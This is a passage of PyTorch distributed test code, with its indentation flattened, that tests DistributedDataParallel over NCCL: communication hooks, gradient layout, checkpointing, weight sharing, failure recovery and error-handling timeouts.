ddp_model.module,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertNotEqual(i.grad, j.grad)
else:
step_model(
ddp_model,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
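def _example_accumulate_with_no_sync(self, ddp_model, inputs, targets):
    # Hedged sketch (hypothetical helper, not part of the original tests): the
    # recommended way to accumulate gradients with DDP is the no_sync() context
    # manager, which skips gradient synchronization for every micro-batch except
    # the last one, instead of stepping the wrapped module directly as above.
    # Assumes `inputs` and `targets` are equally sized lists of tensors.
    import contextlib
    for idx, (inp, tgt) in enumerate(zip(inputs, targets)):
        ctx = ddp_model.no_sync() if idx < len(inputs) - 1 else contextlib.nullcontext()
        with ctx:
            F.mse_loss(ddp_model(inp), tgt.to(inp.device)).backward()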
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module(self):
self._test_accumulate_gradients_module()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module_with_grad_is_view(self):
self._test_accumulate_gradients_module(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_failure_recovery(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# need to create a separate file for the recovered FileStore, because
# the original one will be deleted when the first FileStore is destructed.
recovery_filename = self.file_name + "_recovery"
if self.rank == 0:
# the file will be deleted by the recovered FileStore
open(recovery_filename, "w").close()
# not necessary to run barrier here, as DDP will synchronize
class TestModel(nn.Module):
def __init__(self):
super(TestModel, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = TestModel().float().to(device_id)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
del ddp
del process_group
del store # this will delete self.file_name
store = c10d.FileStore(recovery_filename, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_default_pg(self):
dist.init_process_group(
"nccl",
init_method=f"file://{self.file_name}",
world_size=self.world_size,
rank=self.rank,
)
default_pg = c10d.distributed_c10d._get_default_group()
dist.destroy_process_group(default_pg)
self.assertFalse(dist.is_initialized())
def _test_grad_layout(self, replica_devices, layer_devs, local_batch_size):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = local_batch_size * self.world_size
# Carry out some trials with small buckets and some with big buckets.
bucketsizes = (0.000001, 25)
# Tuples of lists. Each list describes per-layer characteristics for one trial.
layer_formats = (
[torch.contiguous_format] * 4,
[torch.channels_last] * 2 + [torch.contiguous_format] * 2,
[torch.channels_last] * 4,
)
layer_dtypes = (
[torch.float] * 4,
[torch.float] * 2 + [torch.half] * 2,
[torch.half] * 4,
)
input_dev = layer_devs[0] if isinstance(layer_devs, list) else layer_devs
target_dev = layer_devs[-1] if isinstance(layer_devs, list) else layer_devs
input = torch.randn(
(global_batch_size, 8, 8, 8), device=input_dev, dtype=torch.float
)
target = torch.randn(
(global_batch_size, 8, 4, 4), device=target_dev, dtype=torch.float
)
local_batch_start = self.rank * local_batch_size
local_batch_end = (self.rank + 1) * local_batch_size
# Reducer.cpp sneakily creates one "initial bucket" that ignores the "bucket_cap_mb"
# argument. The following makes sure the initial bucket also complies.
@contextmanager
def first_bucket_size(ddp_bucket_mb):
old_DEFAULT_FIRST_BUCKET_BYTES = dist._DEFAULT_FIRST_BUCKET_BYTES
dist._DEFAULT_FIRST_BUCKET_BYTES = int(ddp_bucket_mb * 1.0e6)
try:
yield
finally:
dist._DEFAULT_FIRST_BUCKET_BYTES = old_DEFAULT_FIRST_BUCKET_BYTES
with torch.backends.cudnn.flags(
enabled=True, deterministic=True, benchmark=False
):
for formats, dtypes, bucketsize in product(
layer_formats, layer_dtypes, bucketsizes
):
with first_bucket_size(bucketsize):
model_msg = (
"rank = {} formats = {} dtypes = {} bucketsize = {} ".format(
self.rank, formats, dtypes, bucketsize
)
)
try:
m = ConvNet(layer_devs, formats, dtypes)
m_ddp = DistributedDataParallel(
copy.deepcopy(m),
device_ids=replica_devices,
process_group=process_group,
bucket_cap_mb=bucketsize,
)
opt = torch.optim.SGD(m.parameters(), lr=0.1)
opt_ddp = torch.optim.SGD(m_ddp.parameters(), lr=0.1)
has_half = any(p.dtype is torch.half for p in m.parameters())
tol = 1.0e-3 if has_half else 1.0e-5
except BaseException:
# Prints case-specific debugging info to narrow down failing case.
print(
"Caught exception during model creation for " + model_msg,
flush=True,
)
raise
# 3 iters: First iter creates grads, second iter retests after rebucketing,
# third iter tries zeroed grads.
for it in range(3):
iter_msg = "iter = {} ".format(it) + model_msg
named_msg = iter_msg
try:
F.mse_loss(m(input).float(), target).backward()
F.mse_loss(
m_ddp(input[local_batch_start:local_batch_end]).float(),
target[local_batch_start:local_batch_end],
).backward()
for i, ((layer_name, m_child), m_ddp_child) in enumerate(
zip(m.named_children(), m_ddp.module.children())
):
named_msg = layer_name + ".weight" + " " + iter_msg
self.assertTrue(
m_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
self.assertTrue(
m_ddp_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
for j, ((param_name, p), p_ddp) in enumerate(
zip(
m_child.named_parameters(),
m_ddp_child.parameters(),
)
):
named_msg = (
layer_name + "." + param_name + " " + iter_msg
)
self.assertEqual(
p.grad, p_ddp.grad, rtol=tol, atol=tol
)
opt.step()
opt_ddp.step()
if it == 0:
for p, p_ddp in zip(m.parameters(), m_ddp.parameters()):
p.grad = None
p_ddp.grad = None
else:
m.zero_grad()
m_ddp.zero_grad()
except BaseException:
# Makes sure we still get info if an error occurred somewhere other than the asserts.
print(
"Caught exception during iterations at " + named_msg,
flush=True,
)
raise
@requires_nccl()
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_grad_layout_1devicemodule_1replicaperprocess(self):
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
# Tells DDP to use just one device.
replica_devices = [dev0]
# Tells _test_grad_layout to construct ConvNet with all layers on this process's first assigned device.
layer_devs = dev0
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(4)
@skip_if_rocm
def test_grad_layout_2devicemodule(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
dev0 = torch.device("cuda:" + str(int_devices[0]))
dev1 = torch.device("cuda:" + str(int_devices[1]))
# DDP's default behavior for a multi-device module is "don't replicate."
replica_devices = None
# Tells _test_grad_layout to construct this process's ConvNet on 2 devices, with 2 layers on each device.
layer_devs = [dev0] * 2 + [dev1] * 2
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_param_layout_mismatch_error(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
layer_devs = dev0
layer_formats = (
[torch.contiguous_format] * 4
if self.rank == 0
else [torch.channels_last] * 4
)
layer_dtypes = [torch.float] * 4
m = ConvNet(layer_devs, layer_formats, layer_dtypes)
if self.rank == 0:
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
else:
with self.assertRaisesRegex(
RuntimeError,
".* appears not to match strides of the same param in process 0",
):
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
def _gpu_model_with_ddp_comm_hook(
self,
process_group,
hook=None,
gradient_as_bucket_view=False,
state=None,
static_graph=False,
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
if static_graph:
gpu_model._set_static_graph()
# Register a DDP communication hook, if one is provided.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_future_passing_gpu_nccl(self):
"""
This unit test verifies whether the Future object is passed properly using nccl backend.
The hook callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with simple_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(process_group, self._simple_hook)
# check whether the grads are equal to what simple_hook's then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 2 * torch.ones(2, 2))
def _test_ddp_comm_hook_allreduce_hook_nccl(
self, gradient_as_bucket_view=False, static_graph=False
):
"""
This unit test verifies whether a DDP communication hook that just calls
allreduce gives the same result as the case where no hook is registered.
Without the then callback, the future_value in reducer is no longer
a PyObject, and this unit test verifies future_value is properly checked.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
tensors = [bucket.buffer() / self.world_size]
return (
process_group.allreduce(tensors)
.get_future()
.then(lambda fut: fut.value()[0])
)
# Get GPU model with allreduce_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_hook, gradient_as_bucket_view, static_graph
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_default_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether default Python DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result as the case where no hook is registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# For these default DDP comm hooks, the only state is process group.
state = process_group
for hook in [default.allreduce_hook, default.fp16_compress_hook]:
# Get GPU model with the hook registered.
# The first arg 'process_group' is used for initializing the test environment,
# so it cannot be replaced by 'state', although they have the same value.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_fp16_compress_wrapper(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether wrapping the ALLREDUCE and POWER_SGD hooks with
the FP16_WRAPPER can give the same result as when there is no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
powerSGD_state = powerSGD.PowerSGDState(process_group=process_group)
hook_args = [
(powerSGD.powerSGD_hook, powerSGD_state),
(default.allreduce_hook, process_group),
]
for hook, state in hook_args:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default.fp16_compress_wrapper(hook),
gradient_as_bucket_view,
state,
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_hook_then_optimizer(
self,
functional_optim_cls,
*functional_optim_args,
gradient_as_bucket_view=False,
**functional_optim_kwargs
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
hook, hook_state = default.allreduce_hook, process_group
opt_hook_state = default._OptimizerHookState(
functional_optim_cls,
*functional_optim_args,
**functional_optim_kwargs,
)
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default._hook_then_optimizer(hook, opt_hook_state),
gradient_as_bucket_view,
hook_state,
)
prev_params = copy.deepcopy(list(gpu_model.parameters()))
# Run model with optimizer as part of hook
for _ in range(8):
gpu_model.zero_grad()
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
new_params = list(gpu_model.parameters())
# Run a plain model with the allreduce hook and a separate optimizer step,
# then verify the resulting parameters are the same.
gpu_model_allreduce = self._gpu_model_with_ddp_comm_hook(
process_group, default.allreduce_hook, gradient_as_bucket_view, hook_state
)
sgd = _SUPPORTED_OPTIM_MAPPING.get(functional_optim_cls)(
gpu_model_allreduce.parameters(),
*functional_optim_args,
**functional_optim_kwargs,
)
for _ in range(8):
gpu_model_allreduce.zero_grad()
self._run_and_verify_hook(gpu_model_allreduce, 8, 0.25 * torch.ones(2, 2))
sgd.step()
post_opt_params = list(gpu_model_allreduce.parameters())
for opt_as_hook_param, post_opt_param in zip(new_params, post_opt_params):
self.assertEqual(opt_as_hook_param, post_opt_param)
def _test_powerSGD_ddp_comm_hook_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether Python DDP communication hook POWER_SGD
can give the same result as the case where no hook is registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with the hook registered.
# Test the hook with different algorithmic configs.
for use_error_feedback, warm_start in product([True, False], [True, False]):
state = powerSGD.PowerSGDState(
process_group=process_group,
matrix_approximation_rank=1,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
for hook in [powerSGD.powerSGD_hook, powerSGD.batched_powerSGD_hook]:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_builtin_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether built-in C++ DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result as the case where no hook is registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for comm_hook_type in [
dist.BuiltinCommHookType.ALLREDUCE,
dist.BuiltinCommHookType.FP16_COMPRESS,
]:
# Get GPU model with the built-in communication hook.
gpu_model = self._gpu_model_with_builtin_ddp_comm_hook(
process_group, comm_hook_type, gradient_as_bucket_view
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl(self):
self._test_ddp_comm_hook_allreduce_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl(self):
self._test_default_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_nccl(self):
self._test_fp16_compress_wrapper()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_sgd_nccl(self):
sgd_lr = 1e-2
sgd_momentum = 0.9
sgd_weight_decay = 0.01
self._test_hook_then_optimizer(
_FunctionalSGD,
sgd_lr,
momentum=sgd_momentum,
weight_decay=sgd_weight_decay,
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_sgd_nccl_grad_as_bucket_view(self):
sgd_lr = 1e-2
sgd_momentum = 0.9
sgd_weight_decay = 0.01
self._test_hook_then_optimizer(
_FunctionalSGD,
sgd_lr,
momentum=sgd_momentum,
weight_decay=sgd_weight_decay,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adam_nccl(self):
adam_lr = 1e-2
adam_betas = (0.9, 0.99)
adam_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdam,
adam_lr,
betas=adam_betas,
eps=adam_eps,
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adam_nccl_grad_as_bucket_view(self):
adam_lr = 1e-2
adam_betas = (0.9, 0.99)
adam_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdam,
adam_lr,
betas=adam_betas,
eps=adam_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl(self):
self._test_builtin_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl(self):
self._test_powerSGD_ddp_comm_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_grad_is_view(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_static_graph(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(static_graph=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl_is_view(self):
self._test_default_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_is_view(self):
self._test_fp16_compress_wrapper(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl_grad_is_view(self):
self._test_builtin_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl_grad_is_view(self):
self._test_powerSGD_ddp_comm_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_with_then_hook_nccl(self):
"""
This unit test verifies whether a DDP communication hook that calls allreduce and then
multiplies the result by ten and divides by two gives the expected result.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_with_then_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
tensors = [bucket.buffer() / self.world_size]
fut = process_group.allreduce(tensors).get_future()
def mult(fut):
# Multiply the result by 10.
return 10 * fut.value()[0]
def div(fut):
# Divide the result by 2.
return 0.5 * fut.value()
return fut.then(mult).then(div)
# Get GPU model with allreduce_with_then_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_with_then_hook
)
# check whether the grads are equal to what allreduce returns multiplied by 5 (10 * 0.5).
# Without the comm_hook, the result would still be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 1.25 * torch.ones(2, 2))
class AcceptsParam(torch.nn.Module):
def __init__(self, p, factor):
super().__init__()
self.a = p
self.f = factor
def forward(self, input):
return input + self.a * self.f
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
size = 2048 * 2048
dev = self.rank
world = self.world_size
p = torch.nn.Parameter(torch.randn(size, requires_grad=True))
for try_set_to_none, use_bucket_view in product((False, True), (False, True)):
m = torch.nn.Sequential(
self.AcceptsParam(p, dev + 1), self.AcceptsParam(p, dev + 1)
).cuda(dev)
m = torch.nn.parallel.DistributedDataParallel(
m,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[dev],
process_group=process_group,
)
for i in range(3):
m.zero_grad(set_to_none=try_set_to_none)
m(1).sum().backward()
# Each param value is multiplied by "rank + 1" twice in forward, so the grad
# values produced by a particular rank should be 2. * (rank + 1).
# Summing these over ranks and dividing by world size gives the expected result
# (a hedged helper computing the same value follows this test):
analytic = torch.full_like(
p, 2.0 * (world * (world + 1.0) / 2.0) / world, device=dev
)
for name, p in m.named_parameters():
self.assertEqual(
p.grad,
analytic,
"mismatch at "
+ name
+ ".grad for "
+ "set_to_none = {}, use_bucket_view = {}".format(
try_set_to_none, use_bucket_view
),
)
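def _expected_weight_sharing_grad(self, world):
    # Hedged helper (hypothetical, mirrors the analytic value used in the test above):
    # rank r scales the shared parameter by (r + 1) twice per forward, so its local
    # grad per element is 2 * (r + 1), and the allreduce average over ranks is
    # sum(2 * (r + 1) for r in range(world)) / world = world + 1 (e.g. 3 for world = 2).
    return sum(2.0 * (r + 1) for r in range(world)) / world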
# A list of tests for ddp with activation checkpointing
# when gradient_as_bucket_view=True, False.
# Most of the tests are adapted from
# https://github.com/facebookresearch/fairscale/blob/master/tests/nn/pipe/test_checkpoint_ddp.py
class CheckpointOnceModule(nn.Module):
def __init__(self):
super().__init__()
self.l1 = nn.Linear(20, 20)
self.l2 = nn.Linear(20, 20)
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
return x
class CheckpointTwiceModule(CheckpointOnceModule):
def __init__(self):
super().__init__()
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
x = checkpoint(self.l2, x)
return x
def _prepare_dummy_data(self):
ddp_bs = 16
bs = ddp_bs * self.world_size
input = torch.rand((bs, 20), device="cuda", requires_grad=True)
target = torch.randn((bs, 20), device="cuda")
offset = self.rank * ddp_bs
ddp_input = input[offset : offset + ddp_bs]
ddp_target = target[offset : offset + ddp_bs]
return input, ddp_input, target, ddp_target
def _train_model(self, model, input_var, target, loss, run_checkpoint=False):
model.train()
if run_checkpoint:
output = checkpoint(model, input_var)
else:
output = model(input_var)
l = loss(output, target)
l.backward()
def _test_ddp_checkpointing(
self,
input_model,
process_group,
use_bucket_view,
find_unused_parameters=False,
static_graph=False,
run_checkpoint=False,
):
# to reproduce the same training results
torch.cuda.set_device(self.rank)
torch.manual_seed(31415)
model = copy.deepcopy(input_model).cuda()
ddp_model = copy.deepcopy(input_model).cuda()
ddp_model = nn.parallel.DistributedDataParallel(
ddp_model,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[self.rank],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
)
if static_graph:
ddp_model._set_static_graph()
self.assertEqual(
ddp_model._get_ddp_logging_data().get("static_graph", 0), static_graph
)
input, ddp_input, target, ddp_target = self._prepare_dummy_data()
loss = nn.MSELoss()
for i in range(5):
model.zero_grad(set_to_none=False)
ddp_model.zero_grad(set_to_none=False)
self._train_model(model, input, target, loss, run_checkpoint=run_checkpoint)
self._train_model(
ddp_model, ddp_input, ddp_target, loss, run_checkpoint=run_checkpoint
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertTrue(i.grad is not None)
self.assertTrue(j.grad is not None)
self.assertEqual(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)
# DDP works as expected when a layer is checkpointed only once
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_once(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view, static_graph in product((False, True), (False, True)):
self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
)
# DDP will fail when there are unused parameters in the model
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_unused_params(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
static_graph=False,
)
# test passes when static_graph is true
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
static_graph=True,
)
# DDP will fail when the same layer is checkpointed twice
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_twice(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=False,
)
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=True,
)
# DDP works as expected if there is weight sharing among layers
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
torch.cuda.set_device(self.rank)
for use_bucket_view, static_graph in product((False, True), (False, True)):
torch.manual_seed(31415)
l1 = nn.Linear(20, 20)
l2 = nn.Linear(20, 20)
l1.weight = l2.weight
model = nn.Sequential(l1, l2)
self._test_ddp_checkpointing(
model,
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
run_checkpoint=True,
)
class NcclErrorHandlingTest(MultiProcessTestCase):
def setUp(self):
super(NcclErrorHandlingTest, self).setUp()
# Need to skip return code checking for these tests since the child
# processes don't exit cleanly.
self.skip_return_code_checks = [
self.test_nccl_errors_blocking_abort.__wrapped__,
self.test_nccl_errors_blocking_sigkill.__wrapped__,
self.test_nccl_errors_blocking_sigterm.__wrapped__,
self.test_nccl_errors_blocking_nonzero_exit.__wrapped__,
]
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING, hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected. (A hedged sketch of
# enabling blocking wait follows setUp.)
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
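def _example_enable_blocking_wait(self):
    # Hedged sketch (hypothetical helper, not part of the original test class):
    # blocking-wait semantics are opted into by setting NCCL_BLOCKING_WAIT before
    # the process group is created, combined with a per-operation timeout, so that
    # timed-out collectives raise instead of hanging.
    os.environ["NCCL_BLOCKING_WAIT"] = "1"
    store = c10d.FileStore(self.file_name, self.world_size)
    return c10d.ProcessGroupNCCL(
        store,
        self.rank,
        self.world_size,
        timeout=timedelta(seconds=self.op_timeout_sec),
    )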
def tearDown(self):
super(NcclErrorHandlingTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 3
@property
def blocking_wait_error_msg(self):
return "Caught collective operation timeout"
def _run_all_reduce(self, pg):
pg.allreduce(torch.rand(10).cuda(self.rank))
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_nonblocking(self):
# Note: we unset and restore NCCL_ASYNC_ERROR_HANDLING for this test
# since test_c10d_common runs with async error handling by default, but this
# test checks the behavior when it is not enabled.
prev_nccl_async_error_handling = os.environ.get(
"NCCL_ASYNC_ERROR_HANDLING", None
)
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "0"
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
# This allreduce does not block the Python thread, as allreduce only
# enqueues the CUDA operation and wait() only blocks the current CUDA
# stream.
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
work.wait()
# Now the work scheduled next should hang forever since the previous
# allreduce will never complete.
t = threading.Thread(target=self._run_all_reduce, args=(process_group,))
t.daemon = True
t.start()
t.join(int(get_timeout(self.id()) / 5))
self.assertTrue(t.is_alive())
if prev_nccl_async_error_handling is not None:
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = prev_nccl_async_error_handling
def _test_nccl_errors_blocking(self, func):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# Operation would time out in blocking mode.
work.wait()
# Run some GPU operations to make sure cuda has not gotten stuck.
# It was observed cuda could get stuck if NCCL communicators were
# not properly aborted before throwing RuntimeError.
a = torch.rand(10).cuda(self.rank)
elif self.rank == 1:
# Clean up structures (e.g. FileStore files) before going down
del process_group
func()
else:
# Wait for timeout
time.sleep(2 * self.op_timeout_sec)
# Now verify communicators on this rank have been aborted by the watchdog thread.
self._wait_for_comm_abort(process_group)
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_clean_exit(self):
